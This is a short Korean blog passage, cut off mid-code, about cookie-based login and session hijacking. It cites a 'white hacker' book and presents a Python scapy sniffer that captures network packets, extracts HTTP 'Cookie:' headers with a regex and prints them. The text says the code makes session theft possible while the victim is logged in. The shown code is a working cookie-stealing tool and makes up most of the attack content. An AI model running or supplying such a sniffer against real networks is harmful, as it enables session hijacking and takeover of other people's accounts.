http://itlearner.tistory.com/293 와 http://itlearner.tistory.com/352 에서 포스팅했듯이 쿠키로도 로그인이 가능합니다. 아래는 쿠키정보를 빼내는 코드(화이트 해커를 위한 암호와 해킹 서적 참고)입니다. 이를 이용하면 세션 탈취가 가능합니다. 참고로 이러한 쿠키값 도용은 희생자가 로그인하고 있을 동안만 가능합니다. from scapy.all import * import re def cookieSniffer(packet): tcp = packet.getlayer('TCP') cookie = re.search(r'Cookie: (.+)\\r\\n', str(tcp.payload)) if cookie: print(cookie.group()) def main():..